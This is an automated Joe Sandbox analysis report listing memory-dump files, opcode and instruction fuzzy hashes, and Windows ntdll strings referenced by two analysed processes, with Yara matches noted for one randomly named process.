                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                  • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                                  • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                  • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                  • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                  • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                  • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                  • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                  • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                  • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                  • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                  • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                  • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                  • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                  • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                  • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 008A8827
                                                                                                  • WindowsExcludedProcs, xrefs: 008A87C1
                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 008A89FC
                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 008A8914
                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 008A87E6
                                                                                                  Similarity
                                                                                                  • API ID: _wcspbrk
                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnlen
                                                                                                  • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  APIs
                                                                                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 008D3F12
                                                                                                  Strings
                                                                                                  • Execute=1, xrefs: 008D3F5E
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 008DE345
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 008D3F75
                                                                                                  • ExecuteOptions, xrefs: 008D3F04
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 008D3EC4
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 008DE2FB
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 008D3F4A
                                                                                                  Similarity
                                                                                                  • API ID: BaseDataModuleQuery
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: __fassign
                                                                                                  • String ID: .$:$:
                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E2206
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  APIs
                                                                                                  • ___swprintf_l.LIBCMT ref: 008EEA22
                                                                                                    • Part of subcall function 008C13CB: ___swprintf_l.LIBCMT ref: 008C146B
                                                                                                    • Part of subcall function 008C13CB: ___swprintf_l.LIBCMT ref: 008C1490
                                                                                                  • ___swprintf_l.LIBCMT ref: 008C156D
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$]:%u
                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E22F4
                                                                                                  Strings
                                                                                                  • RTL: Resource at %p, xrefs: 008E230B
                                                                                                  • RTL: Re-Waiting, xrefs: 008E2328
                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008E22FC
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 885266447-871070163
                                                                                                  • Opcode ID: 75bb36dca9921d5b358113db27abea90da5bb5ca019774f7dcbdcefa8bff5a76
                                                                                                  • Instruction ID: 2ca0ade7d821966cbdedf6cd2ddefee1e062d6349907fe140793985e9ff74962
                                                                                                  • Opcode Fuzzy Hash: 75bb36dca9921d5b358113db27abea90da5bb5ca019774f7dcbdcefa8bff5a76
                                                                                                  • Instruction Fuzzy Hash: 1F5128716006056BEF11DB29CC81FA673ACFF96360F104229FD18DB781EA71EC818BA1
                                                                                                  Strings
                                                                                                  • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 008E248D
                                                                                                  • RTL: Re-Waiting, xrefs: 008E24FA
                                                                                                  • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008E24BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                   • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                  • API String ID: 0-3177188983
                                                                                                  • Opcode ID: 16cbd6eb6be60d790d755cbd31a705052e7c83dc16ef92ce7d5d18f97089dc20
                                                                                                  • Instruction ID: c34ff95a517301b841fe9d076794401ab5931e88bd569f2886f5e2aae9469c8e
                                                                                                  • Opcode Fuzzy Hash: 16cbd6eb6be60d790d755cbd31a705052e7c83dc16ef92ce7d5d18f97089dc20
                                                                                                  • Instruction Fuzzy Hash: A941E470604204ABDB20EB69CC89F6A77B8FF46724F208A09F565DB3D1D734E9418766
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                   • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                   • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __fassign
                                                                                                  • String ID:
                                                                                                  • API String ID: 3965848254-0
                                                                                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                  • Instruction ID: 28194a3dfc470fb678315caf02e57ff23b3c3bc52870c8b9adf1ee0c02fb5190
                                                                                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                  • Instruction Fuzzy Hash: CA915971D0024AEBDF24DFA9C8456FEB7B4FF55318F24807AD511EA263E7309A818B91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c3d112355c7b65aec377be5e3f407a1b460c1078adede0e56796cb812b3fd9ed
                                                                                                  • Instruction ID: f4f2fad9720321fa264858b54920da9f3a05b8b9c22f6754a3d3682d3b784cba
                                                                                                  • Opcode Fuzzy Hash: c3d112355c7b65aec377be5e3f407a1b460c1078adede0e56796cb812b3fd9ed
                                                                                                  • Instruction Fuzzy Hash: 9A41D9016583F10ED30E836D08BD675AFC18EA720174EC2EEDADA5F3E3D4848408D3A5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "s$&$)8$.$.$.$;m$?$A$C@$Cr$Fl$G$G#$L$M1$Q$T9$Wi$[$[k$]$]$`$c$e$g$l$l$r$ra$s${$~`$-$E$z${
                                                                                                  • API String ID: 0-1054295309
                                                                                                  • Opcode ID: 65a36a55c771a82fe5cf0e97a2ced832c14231784d84fca66674995da78a0623
                                                                                                  • Instruction ID: abc7be18f7068322966726e31a7b10c9c19655b8424e78cbbe15734922ab54cc
                                                                                                  • Opcode Fuzzy Hash: 65a36a55c771a82fe5cf0e97a2ced832c14231784d84fca66674995da78a0623
                                                                                                  • Instruction Fuzzy Hash: 32627FB0D15229CBEB29CF44C9A8BDEBBB1BF49308F1081D9D5096B281E7756E85CF44
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$O$S$\$s
                                                                                                  • API String ID: 0-3854637164
                                                                                                  • Opcode ID: ddadf2530f20be13fdbaf0db4d320aac369c3f8a808d007b434b2ba3987b11f8
                                                                                                  • Instruction ID: 8da009d67c3e9a8834ab1512749ea6059c6bc08b489a3b3241879c29bec559ee
                                                                                                  • Opcode Fuzzy Hash: ddadf2530f20be13fdbaf0db4d320aac369c3f8a808d007b434b2ba3987b11f8
                                                                                                  • Instruction Fuzzy Hash: 5351D3B2D01228ABEB24DF94DD45FEFB378EB54314F108199E90857140F6B56A448FA5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
